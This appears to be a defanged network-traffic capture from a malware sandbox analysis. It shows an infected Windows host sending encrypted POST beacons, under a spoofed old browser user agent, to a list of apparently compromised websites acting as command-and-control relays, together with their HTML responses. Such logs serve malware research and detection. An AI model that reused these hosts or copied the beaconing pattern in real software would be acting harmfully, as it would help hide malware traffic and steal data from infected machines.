Nak7zeR64F0O9dkIfwgQcrc7i0qcDUUhWA7Gf8mHhLC9Dp26bU8qks99djwIsaQqMvZCZMMZfln/9VwlfPiHJsZ9iUOf9VEULO0NtAMoZ8lxBPG1dcH8orANFBtmJNiz8dyAFjPdsnBkipaT mUMGnL21zrNWr3sslMA8zgXR5VxUl2PjI9cgc8JC5v7RbKUj1Y32fgFQiQ Jj2mi/tfKLDdMUyYCBxifqIqW4CSXYUeIBppkMwWUvif4Uie3hPD9eK 44RmXlAGpw4DN2FkZM6hvXfTORMBU995ozRoTCWZub44X3HoH0Lt02i45w8N4gPOudJRj5SiKLFGSS7cf72m4lS2vIE5zPgNinIt/Uh9psMrH7JmUH2KaT/bJzfomn7FFM1arRkVkTvNjBsyxfcOugzQaFmutTrw3clgiCObNsDS sYeyFMFRehIcJzLanVLY4P4 txbx3CwH6RS5c3d5MbWz4FWNTeUCDZ/HChYLS5QSU42
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=db0a4ed1d16a3a192e6b86a5c6eaa77151498907798; expires=Sun, 01-Jul-18 11:16:38 GMT; path=/; domain=.cgc-england.com; HttpOnly
X-Accel-Version: 0.01
Last-Modified: Sat, 17 Jan 2015 12:19:53 GMT
Vary: Accept-Encoding
X-Powered-By: PleskLin
Server: cloudflare-nginx
CF-RAY: 3778f449e5128231-KBP
36f3..<!DOCTYPE html>.<html lang="fr-FR" prefix="og: hXXp://o
gp.me/ns#" class="no-js csstransforms no-csstransforms3d csstransitio
ns">.<head>.<meta http-equiv="Content-Type" content="text/
html; charset=UTF-8">....<meta charset="utf-8">.....<title
>CAMBRIDGE GARDENS COLLEGE | English Language School in Hastings<
;/title>...........<!-- Mobile Specific Metas. .===============
=================================== -->..<meta name="viewport" c
ontent="width=device-width, initial-scale=1, maximum-scale=1"> ....
<link rel="profile" href="hXXp://gmpg.org/xfn/11">..<link rel
="alternate" type="application/rss xml" title="RSS 2.0" href="hXXp://w
ww.cgc-england.com/feed/">..<link rel="alternate" type="text/xml
" title="RSS .92" href="hXXp://VVV.cgc-england.com/feed/rss/">..<
;link rel="alternate" type="application/atom xml" title="Atom 0.3" hre
f="hXXp://VVV.cgc-england.com/feed/atom/">..<link rel="pingback"
href="hXXp://VVV.cgc-england.com/xmlrpc.php">..<link rel="short
cut icon" href="flavicon.png" type="image/gif">............<meta
name="robots" content="noindex,nofollow">..<!-- This site is op
timized with the Yoast WordPress SEO plugin v1.4.13 - hXXp://yoast.com
/wordpress/seo/ -->.<link rel="canonical" href="hXXp://VVV.cgc-e
ngland.com/">.<meta property="og:locale" content="fr_FR">.<
;meta property="og:type" content="website">.<meta property="og:t
itle" content="CAMBRIDGE GARDENS COLLEGE - English Language School

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 488
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: bocr.cz
Connection: Keep-Alive
Cache-Control: no-cache

5ti384cS1Wn/uS98tq7RUFDqKeZ9bQlPqwYvYUSxSGQh8pqRfxn3YklWBpK3K8Jn Rhodo7ddj9nj1EyrE9/KInSr3Aq0ugf19vBV26dvKGFGLjM9Q/FN1mu78QWBI9EMxdcChhptie5ly465a77dXZtZjARm XfE82OQFT3KJ/jxy287m95Rnw6peGF7FqJsawwRz8j2jNtnWaqEmS9emCNUhTnF9hGKniF6hJMjwDoNPCl 8/NRljM3Kyg1bVF4c97d2u18vyW8LH9217a9x7JQ/nV6Ls 74Yfje6FzQ6a//rjV3 JZ3btPChhyRPdPULv9NGzt8EOlpLhdGLxTbnVUrk8tN8D3jAu3D0gIAZFyjepgVhvqqkTVBUqIeLtiAGtW9ypMKfeQsRRsiL7RuIFkyjKcLkSZIrA2qJdnTYMSNrqtDUC4z2b8BAKtZsiXelARhycZcQvePfTDvBaNVfiripAeUcHv/l8gyFI
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sat, 01 Jul 2017 11:16:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: hXXps://VVV.bocr.cz/
0..HTTP/1.1 301 Moved Permanently..Server: nginx..Date: Sat, 01 Jul 20
17 11:16:52 GMT..Content-Type: text/html; charset=UTF-8..Transfer-Enco
ding: chunked..Connection: keep-alive..Location: hXXps://VVV.bocr.cz/.
.0..
....



POST / HTTP/1.1

Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 488
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: bocr.cz
Connection: Keep-Alive
Cache-Control: no-cache

IY7FtpGdmmqkDxhUMLk5pOpLurZPPkv1Vc1DIyM4FuYtMytelr1ppMfGtfuGhYosNXDd6U9w/yJDyD2SsL3kF7nytbQh19tICQonsMUNoP2F7KVwIw0R2GNn/qVV0M7vAdUU0GGkvY05z0posUI57XhcD9w9ZEhvQKUnd2 xOcwVdBBx0sz2mo1SMI28dI1IxXZA45XvyenIwkCcC0fZA3gswOgPx/FKkH2yy7G1vtyyX34sLzko99wv0Ax9b/7DLghODx0x2VoiSGf19h7GUw4neA3JR55hsFvkNSjj gJv5tqDz8HrPOr/hmKdHqF93Z2KvodL/OlDeXHxhpDi/45IgVe2YpjULBjlt30kT8omYJgrAKGsT tCa/eh7ID6AhCXfaiSGtwt0NhNWOr62WESi9Onq1WOGaDliMVlNmiXBr wuF0b3CVeYxfRKVAmM gjDHLDad/ibZuL9fjDnU92VccCrpce63aziIM=
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sat, 01 Jul 2017 11:16:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: hXXps://VVV.bocr.cz/
0..HTTP/1.1 301 Moved Permanently..Server: nginx..Date: Sat, 01 Jul 20
17 11:16:52 GMT..Content-Type: text/html; charset=UTF-8..Transfer-Enco
ding: chunked..Connection: keep-alive..Location: hXXps://VVV.bocr.cz/.
.0..


GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive
Cache-Control: no-cache
Host: bigtopmultimedia.net


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:50 GMT
Server: Apache
X-Pingback: hXXp://bigtopmultimedia.net/xmlrpc.php
Link: <hXXp://bigtopmultimedia.net/wp-json/>; rel="hXXps://api.w.org/", <hXXp://bigtopmultimedia.net/>; rel=shortlink
Set-Cookie: wfvt_3454315397=595784a37e7fa; expires=Sat, 01-Jul-2017 11:46:51 GMT; path=/; httponly
Cache-Control: max-age=86400
Expires: Sun, 02 Jul 2017 11:16:50 GMT
Vary: Accept-Encoding
X-Powered-By: PleskLin
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
11084..<!DOCTYPE html>.<html class="no-js" lang="en-GB" prefi
x="og: hXXp://ogp.me/ns#" itemscope="itemscope" itemtype="hXXp://schem
a.org/WebPage">..<!-- head -->.<head>..<!-- meta --&
gt;.<meta charset="UTF-8" />.<meta name="viewport" content="w
idth=device-width, initial-scale=1, maximum-scale=1">.<title ite
mprop="name">Home - Big Top MultimediaBig Top Multimedia</title&
gt;...<link rel="shortcut icon" href="hXXp://bigtopmultimedia.net/w
p-content/uploads/2016/01/favicon.png" />..<link rel="apple-touc
h-icon" href="hXXp://bigtopmultimedia.net/wp-content/uploads/2016/01/a
pple-touch-icon.png" />....<!-- wp_head() -->.<!-- script
| dynamic -->.<script>.//<![CDATA[.window.mfn_ajax = "http
://bigtopmultimedia.net/wp-admin/admin-ajax.php";.window.mfn_nicescrol
l = 40;.window.mfn_parallax = "enllax";.window.mfn_prettyphoto = {styl
e:"pp_default", width:0, height:0};.window.mfn_sliders = {blog:0, clie
nts:0, offer:0, portfolio:0, shop:0, slider:0, testimonials:0};.window
.mfn_retina_disable = 0;.//]]>.</script>..<!-- This site i
s optimized with the Yoast SEO plugin v4.3 - hXXps://yoast.com/wordpre
ss/plugins/seo/ -->.<link rel="canonical" href="hXXp://bigtopmul
timedia.net/" />.<meta property="og:locale" content="en_GB" />
;.<meta property="og:type" content="website" />.<meta propert
y="og:title" content="Home - Big Top Multimedia" />.<meta proper
ty="og:description" content="CLICK HERE TO CONTACT US" />.<m

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 428
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 4pipp.com
Connection: Keep-Alive
Cache-Control: no-cache

TnmxAoXAw3J5hOjVrLgR3P4O0nNTXi4UicVu q1DFIVWAuvx3Fp99tCrvdKcGtBVqFAZgu93MiHFUcT uZ7meF1ZOO/xr9BlXs0h1WJ5C7bTlT91PncT0bgbOskPTneXakVa9hqC3mTF/lNyb6C7iW4DUP21mipZUwXqpHbfbZhwCfLhOPOoGCIlWxBnmL9k0trZ0qTHFwnj42Ok4S1a8vZpLRivnP39erafsLO7Z/pDJNXENBdcdp4APJSUWCj6TgkDwyAAcch2mTKjvxZMHSQFUeToQ2rorg6cll4RGhIrNcK4DZ Pp96KT8iNq 34gw5zHXI2IuwHzo36ZJQ9kx6qTzGyeFLoXELmYM74VsIoPqT3c0lACfYoXDcUE5VshcGVUhkoVMMye/bsh AliXDw8MEQT6wI8fyRZt2Bktpr
HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 01 Jul 2017 11:17:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: __cfduid=dd25477737800904a31486a0e9c2eeddb1498907822; expires=Sun, 01-Jul-18 11:17:02 GMT; path=/; domain=.4pipp.com; HttpOnly
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache
Server: cloudflare-nginx
CF-RAY: 3778f4e28383826d-KBP
10b6..<!DOCTYPE HTML>.<html lang="en-US">.<head>.  &
lt;meta charset="UTF-8" />. <meta http-equiv="Content-Type" con
tent="text/html; charset=UTF-8" />. <meta http-equiv="X-UA-Comp
atible" content="IE=Edge,chrome=1" />. <meta name="robots" cont
ent="noindex, nofollow" />. <meta name="viewport" content="widt
h=device-width, initial-scale=1, maximum-scale=1" />. <title>
;Just a moment...</title>. <style type="text/css">. ht
ml, body {width: 100%; height: 100%; margin: 0; padding: 0;}. body
{background-color: #ffffff; font-family: Helvetica, Arial, sans-serif;
font-size: 100%;}. h1 {font-size: 1.5em; color: #404040; text-alig
n: center;}. p {font-size: 1em; color: #404040; text-align: center;
margin: 10px 0 0 0;}. #spinner {margin: 0 auto 30px auto; display:
block;}. .attribution {margin-top: 20px;}. @-webkit-keyframes b
ubbles { 33%: { -webkit-transform: translateY(10px); transform: transl
ateY(10px); } 66% { -webkit-transform: translateY(-10px); transform: t
ranslateY(-10px); } 100% { -webkit-transform: translateY(0); transform
: translateY(0); } }. @keyframes bubbles { 33%: { -webkit-transform
: translateY(10px); transform: translateY(10px); } 66% { -webkit-trans
form: translateY(-10px); transform: translateY(-10px); } 100% { -webki
t-transform: translateY(0); transform: translateY(0); } }. .bubbles
{ background-color: #404040; width:15px; height: 15px; margin:2px; bo
rder-radius:100%; -webkit-animation:bubbles 0.6s 0.07s infinite ea

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 492
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: racknstackwarehouse.com.au
Connection: Keep-Alive
Cache-Control: no-cache

oHLnFQlkSXPZPptTWJ3lGSJtrnMn4v12Tb8QyggbQO9r26siRKEmgA343KxHfdFA2r1uRwgu/YaWUob9K5AsjmJu5/UfN0enV2sDe5dC8widF8pBFlZKdNfRzy89Snu0sjo/7w9tnFCCWo1zq4CxGgymZZRA6Z3a6oHtU8cYSOhFXzb0fHkQiyJp9cnEgzDR30qOsfIM4ugQ2ZIkb8dwlFWB7YoJvswJI4Vri 0HjBVen2UDooyaDiGOk26QeSyreJHfiiXALv5/e3LfPhrwNUUm3ZqsxTsVititF0I3wZFgfjr/ VH84o5vEM8FV5PN5gmv0S1EQUPGT4jgwjQhFSz7JH7k/Ksdidc1hb6emARGQll7E39guSBE16bSmDYKoznVbHo/NLNmfXCNsFptNA2XHftTZo0Kiva fXfvpyNELGhUBbrw52Ki40GdxCNDJH4udjKS/P9tS7A0QN6WwwoVvkzyaKSy GRcb6WfktLA
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sat, 01 Jul 2017 11:17:03 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: hXXp://VVV.racknstackwarehouse.com.au/
X-Powered-By: PleskLin
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>nginx</center>..</body>..</html>..HTTP/1.1 301
Moved Permanently..Server: nginx..Date: Sat, 01 Jul 2017 11:17:03 GMT
..Content-Type: text/html..Content-Length: 178..Connection: keep-alive
..Location: hXXp://VVV.racknstackwarehouse.com.au/..X-Powered-By: Ples
kLin..<html>..<head><title>301 Moved Permanently<
/title></head>..<body bgcolor="white">..<center>&
lt;h1>301 Moved Permanently</h1></center>..<hr>&l
t;center>nginx</center>..</body>..</html>....


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 484
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: sortedorganizing.com
Connection: Keep-Alive
Cache-Control: no-cache

IFpZuFIhbV6f0BNyBVBCxFWiRH2i5wCZppScQUKoTst/IZj4t1AEahem70lpZKaSb5UHKRqoJdop33p9WIxrhIaZ/UtJLqiPs3IlMJxd6HgyMsF9gbROJGWWVZvRyEFWcyJJ7Gor7Vf5xhOvKJhPWAKq4nO6z5s9frJwnhZZWKqm2/wLcDtvnHBP3Vdwz 0JA4ZptO s8CRGDzI5vi/5S1rm8CuMPNzjPCUoBc2zlRowVjau8/bl5JQ9GvxipFjbhHcobXyzJTgLbpzJUDq/x91tzQy w9pxKAGhJoAVf/Ecf1EZuIAClbO86uYNgoKPRjQtRB82ElLeJ3HWXo5CATcG7Tu8B6SJN87StONxep1kC5DcWAwXeYlpNmkW3A5KEXz0E17ezERSQanLJRuRJNP3FArz2DbLmbR1K0s8BK/0Hbue4sXWUP64OyyAWz9QpIYfN QwCzp71fmjZxu4UyTcxy0ZaszjymSq
HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 01 Jul 2017 11:16:04 GMT
Location: hXXps://VVV.hugedomains.com/domain_profile.cfm?d=sortedorganizing&e=com
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Content-Length: 192
Connection: keep-alive
<html><head><title>Object moved</title></he
ad><body>..<h2>Object moved to <a href="hXXps://VVV.
hugedomains.com/domain_profile.cfm?d=sortedorganizing&e=com">he
re</a>.</h2>..</body></html>..HTTP/1.1 302 Fou
nd..Cache-Control: private..Content-Type: text/html; charset=utf-8..Da
te: Sat, 01 Jul 2017 11:16:04 GMT..Location: hXXps://VVV.hugedomains.c
om/domain_profile.cfm?d=sortedorganizing&e=com..Server: Microsoft-IIS/
8.5..X-Powered-By: ASP.NET..Content-Length: 192..Connection: keep-aliv
e..<html><head><title>Object moved</title><
/head><body>..<h2>Object moved to <a href="hXXps://w
ww.hugedomains.com/domain_profile.cfm?d=sortedorganizing&e=com">
;here</a>.</h2>..</body></html>..
....



POST / HTTP/1.1

Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 512
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: sortedorganizing.com
Connection: Keep-Alive
Cache-Control: no-cache

fPqhnPDxL3WixoAJA9yz6qMiaVuYT5jzJEjgGJ5hOO3fCkZzl2Qj/X5dCclnGVdXlnu1CtaFsm6HldroVxySoP 520wrGpzIpuLbMSn6n54jjkndkqAiZCjG3O87HO89YqdWCXm9neT2cTlHvDuHrN3qx80HmHfbD5mK5lcyDGR3BPwpneVGAQqW8HaAqA2c8FEnYAKlKbdJqv9QcIRIVl nIaUrXC/0feV ujYGka9GrScEwAW/R3m XSZF1yjMHkBr4XzvGmoYj7IK9fpK0s7hQIYh 7zKCy5Q oJmI9wO36/SVd R12wfUFjb8jbLFPw0b2XpBuxjr CRosoyZtHhrAAysBgVRRFDXuBH8JwFc40tYUjdCJWNKU4OEhgDHdENpigXe6fmr2f647eEmpoFQ AVq8a0Z/qc0Lzq1xJz3ldO/tQHlISWyIH20Nff3uhnHgH2gDGkWKLMN7713h wLCQuKiykoMK5rI2Vgmic Lxdf0gxwNM5lWe4qGI=
HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 01 Jul 2017 11:16:30 GMT
Location: hXXps://VVV.hugedomains.com/domain_profile.cfm?d=sortedorganizing&e=com
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Content-Length: 192
Connection: keep-alive
<html><head><title>Object moved</title></he
ad><body>..<h2>Object moved to <a href="hXXps://VVV.
hugedomains.com/domain_profile.cfm?d=sortedorganizing&e=com">he
re</a>.</h2>..</body></html>..HTTP/1.1 302 Fou
nd..Cache-Control: private..Content-Type: text/html; charset=utf-8..Da
te: Sat, 01 Jul 2017 11:16:30 GMT..Location: hXXps://VVV.hugedomains.c
om/domain_profile.cfm?d=sortedorganizing&e=com..Server: Microsoft-IIS/
8.5..X-Powered-By: ASP.NET..Content-Length: 192..Connection: keep-aliv
e..<html><head><title>Object moved</title><
/head><body>..<h2>Object moved to <a href="hXXps://w
ww.hugedomains.com/domain_profile.cfm?d=sortedorganizing&e=com">
;here</a>.</h2>..</body></html>..
....



POST / HTTP/1.1

Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 508
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: sortedorganizing.com
Connection: Keep-Alive
Cache-Control: no-cache

WswY0PBUboW1lJeXA NQRKN5LCiYrsUSJFuLYhc8vUE8hVJLKhrdjq96Z3ENGHV/Lm84Q0k4A7gacJX9/XiOKLSdherofBzI9lKAXD7o/0i6j8qFVXHQC2/8/mO6IkImOFdxWsISLbpj5ipkly9HXagc01grXGBbVy KOVaJCR/CDk qYoTvZlavKqGd olrUJAmiH8NJKA BeAEdiymgbY7LEbhX693shurSk/5kFBOG2WCzatn6ydQGlqMnsQHlai0ZZ2PIiq9aVUCyr1H23qzXEcunWqQ7ET14W6Cr6KKT1U3qX0u8IeJXU/p1NSNUob/x0iD1iYooB71 mVvExtktwnyxdIioxaooxO/dclVSj3QIrs0enyu7RDBoFiQG7rDEZ5ZdBH6AcOOhHQrqqt6BSEjNFzExloCGexE/GOqhVGc7d7E5KsEYUDcpZrKVZg GYz9jFTGWRDMZG2Cbad6XtROT9XUsvh2buqW7uq3x7UyfoenCXYh0dg=
HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 01 Jul 2017 11:16:49 GMT
Location: hXXps://VVV.hugedomains.com/domain_profile.cfm?d=sortedorganizing&e=com
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Content-Length: 192
Connection: keep-alive
<html><head><title>Object moved</title></he
ad><body>..<h2>Object moved to <a href="hXXps://VVV.
hugedomains.com/domain_profile.cfm?d=sortedorganizing&e=com">he
re</a>.</h2>..</body></html>..HTTP/1.1 302 Fou
nd..Cache-Control: private..Content-Type: text/html; charset=utf-8..Da
te: Sat, 01 Jul 2017 11:16:49 GMT..Location: hXXps://VVV.hugedomains.c
om/domain_profile.cfm?d=sortedorganizing&e=com..Server: Microsoft-IIS/
8.5..X-Powered-By: ASP.NET..Content-Length: 192..Connection: keep-aliv
e..<html><head><title>Object moved</title><
/head><body>..<h2>Object moved to <a href="hXXps://w
ww.hugedomains.com/domain_profile.cfm?d=sortedorganizing&e=com">
;here</a>.</h2>..</body></html>....


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 472
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: chocolatecovers.com
Connection: Keep-Alive
Cache-Control: no-cache

/GbcwVgc4F3OiU5YW3OzEEt9suUgjnBzDG0Ujv7ziry1rlGCoPzxn4EDDglCKJ6 8W6IhXxcjY5pJI3eadYtN1XbV5Qe2dgWGNRWxX23m4 Ef4rt1AbKkJrs1N6E8W09its6HNXPZtsvJjWnMU3rI0UNSPGBFePW3jcODPyHDTXDyXCyM P2MNLI1QLj KEqOvTMuusx8BSRrkZvaDvxOPQlJ8PVoobrq5dkUMEN5w87B2lai2DOEAaUL2Qh2udIuej28A4l6vuphubhl0nnTJSnfyJlKt jDal2CCXExPSmOmPDPZY7hqYRiu pJKVvQZdGUQMQwz2IKNsS3EisuFC/7VZknRhof9uLzY paVK6WsdqydgSSWw5SYlOobwjQfV6KQu2mpua 2ktoHHUQ6xHwMuJglEZ1qNXN20LsLmMRlh6WD6rDKukLu nnb29/XUCazgnolyB0X6KbEbNRMA=
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:38 GMT
Server: Apache/2.2.15 (Red Hat)
Set-Cookie: mightymerchant=f4bg2ofp577eifcg7qtdjamlv1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cc4_mighty=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=chocolatecovers.com
Vary: Accept-Encoding
Keep-Alive: timeout=3, max=1000
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
680d..<!DOCTYPE html>.<html lang="en">.<head>.  <
meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.
<meta charset="utf-8">. <!-- Title and other stuffs -->
. <title>ChocolateCovers - Custom Candy Bar Wrappers for any Oc
casion</title>. <meta name="viewport" content="width=device-
width, initial-scale=1.0">. <meta name="description" content="S
weeten any occasion with custom candy bar wrappers around Hershey bars
. Perfect for businesses, schools, weddings, showers, anniversaries,
holidays, reunions, and so much more!">. <meta name="keywords"
content="candy wrappers, Chocolate Covers, Custom Candy Bar Wrappers,
Custom Hershey Bar, Personalized Wrapper, Logo, Branded, Business,">
;. <meta name="author" content="MightyMerchant v5.1">. <lin
k rel="canonical" href="hXXp://VVV.chocolatecovers.com" />..<met
a property="og:title" content="ChocolateCovers - Custom Candy Bar Wrap
pers for any Occasion"/>..<meta property="og:site_name" content=
"ChocolateCovers LTD"/>..<meta property="og:url" content="http:/
/VVV.chocolatecovers.com/"/>..<meta property="og:description" co
ntent="Sweeten any occasion with custom candy bar wrappers around Hers
hey bars. Perfect for businesses, schools, weddings, showers, anniver
saries, holidays, reunions, and so much more!"/>..<meta property
="fb:admins" content="" />. <link href='hXXps://fonts.googlea
pis.com/css?family=Open Sans:400,400italic,600,600italic' rel='sty

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 484
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rewardhits.com
Connection: Keep-Alive
Cache-Control: no-cache

LwHe68swxGm/gTJEIk pijRRxYQRI8i5L4cTzvQPiJDQfHap72PHr2QwYn CoHitpMWV6iXeTSzgDrc1OsUn8UQeATdKQfcVvzOuaz3phDp psPiIh1XBq7wImSf 9LDOYgVLAJX44AskJ2LyXDGVT9ccA/SFdWQ52XXJhYJPMrPyOcw6TnKnaB1hOeN1CdkxtdaseVdEEBm9997tmtUaafSvz4ittyg3pVEP/b7GJHgLtEgeJuzfv06YcgMIVApx1rqlPS4K8GkZplV5itH9utVcoVXyqZlIp4M3dGUxjx/oRqjsypTyC9Gbz Gs/O0Bk6QQ55VeuWjp3t097cp8vPhCIF5g9CxhMm/7ge8ymxQs3j9lxaOA00GrT7c5iASQZyiCMjtnJjGhlZJSXsX2V4cSYbUg40gD0qVYTfCUl/HXreX9KthSf4u/3OMUArvF32y6PzMUSbXrXvJe9mrSrqsWynmAicdFnqf
HTTP/1.1 307 Temporary Redirect
Connection: close
Pragma: no-cache
cache-control: no-cache
Location: /


GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Cookie: bb2_screener_=1498907827 89.35.6.153 194.242.96.218
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.topex.ro
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 403 Forbidden
Server: Advanced Hosting by hXXp://VVV.unixy.net/advanced-hosting/varnish-nginx-cpanel/
Date: Sat, 01 Jul 2017 11:17:08 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 99260
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: bb2_screener_=1498907828 89.35.6.153 194.242.96.218; path=/
X-Cacheable: NO: beresp.status
X-Cacheable-status: 403
Accept-Ranges: bytes
X-Varnish: 445536028
Age: 0
Via: 1.1 varnish
X-Cache: MISS
<!DOCTYPE html>.<html class="no-js" lang="en-US" prefix="og: 
hXXp://ogp.me/ns#">.<!-- head -->.<head>.<!-- meta -
->.<meta charset="UTF-8" />.<meta name="viewport" content=
"width=device-width, initial-scale=1, maximum-scale=1">.<script&
gt;.(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||f
unction(){.(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=
s.createElement(o),.m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m
.parentNode.insertBefore(a,m).})(window,document,'script','hXXps://www
.google-analytics.com/analytics.js','ga');.ga('create', 'UA-78356327-2
4', 'auto');.ga('send', 'pageview');.</script>.<link rel="sho
rtcut icon" href="hXXp://VVV.topex.ro/wp-content/uploads/2016/11/favic
on.ico" />..<!-- wp_head() -->.<title>Rohde & Schwa
rz Topex - Mission Critical and Enterprise Solutions</title>.<
;!-- script | dynamic -->.<script id="mfn-dnmc-config-js">.//
<![CDATA[.window.mfn = {mobile_init:1240,nicescroll:40,parallax:"tr
anslate3d",responsive:1,retina_disable:0};.window.mfn_prettyphoto = {d
isable:false,disableMobile:false,title:false,style:"pp_default",width:
0,height:0};.window.mfn_sliders = {blog:0,clients:0,offer:0,portfolio:
0,shop:0,slider:0,testimonials:0};.//]]>.</script>.<!-- Th
is site is optimized with the Yoast SEO plugin v4.9 - hXXps://yoast.co
m/wordpress/plugins/seo/ -->.<meta name="description" content="E
stablished back in 1990, Rohde & Schwarz Topex S.A. is part of

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 512
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: atr-technologies.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: __cfduid=d7931c4c5e390183a8c947585e6f9c9c81498907800

ZPbkxI5uuXIyuvqfGSTEvfEuhZiOs4luorfhN7qBMXc4b8cfqueBqWr9nDLmdxdZfLoEvYndvz90bSoUcup85oH1vCbBZYcT9qhoTpiaTx2jeJxmZDG54siBBIhWuFXZIWBVOptffRWm1BQvn FsO8pYt13S2c9 WdCmMDO6ydAa4OOrBYypt9T7ttmP0IN53jDyU8NR/Kxr3ZFosqeOcX4S9LDXY/QiipGc3F79Fu1/47V3vGq8SYcQkDj9FA8fuOetnN96yxKpiHLBInJN4A/Hsto2Jlij5cwLTabp6K6agyywH0FnWH1GEYTnbgoS jJ9S/p8PR1vytZI9h44s2OyqBUs/HBrQ1KSixqc5YFgC6FbOxV3WmctV kvm71oHIxrpTjHfyBPP jGWkF3BZLitUb9kTUmidmKc3bE3/FYjeX0Znt4EOxTMZZb28WnyJl5 TUmwx6aPqL2JuuFtY5vclvKCCpv7oGSxTakpa1Y6CthzzT7 w2AOvE2PzY=
HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 01 Jul 2017 11:17:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache
Server: cloudflare-nginx
CF-RAY: 3778f4e1d2a18255-KBP
1100..<!DOCTYPE HTML>.<html lang="en-US">.<head>.  &
lt;meta charset="UTF-8" />. <meta http-equiv="Content-Type" con
tent="text/html; charset=UTF-8" />. <meta http-equiv="X-UA-Comp
atible" content="IE=Edge,chrome=1" />. <meta name="robots" cont
ent="noindex, nofollow" />. <meta name="viewport" content="widt
h=device-width, initial-scale=1, maximum-scale=1" />. <title>
;Just a moment...</title>. <style type="text/css">. ht
ml, body {width: 100%; height: 100%; margin: 0; padding: 0;}. body
{background-color: #ffffff; font-family: Helvetica, Arial, sans-serif;
font-size: 100%;}. h1 {font-size: 1.5em; color: #404040; text-alig
n: center;}. p {font-size: 1em; color: #404040; text-align: center;
margin: 10px 0 0 0;}. #spinner {margin: 0 auto 30px auto; display:
block;}. .attribution {margin-top: 20px;}. @-webkit-keyframes b
ubbles { 33%: { -webkit-transform: translateY(10px); transform: transl
ateY(10px); } 66% { -webkit-transform: translateY(-10px); transform: t
ranslateY(-10px); } 100% { -webkit-transform: translateY(0); transform
: translateY(0); } }. @keyframes bubbles { 33%: { -webkit-transform
: translateY(10px); transform: translateY(10px); } 66% { -webkit-trans
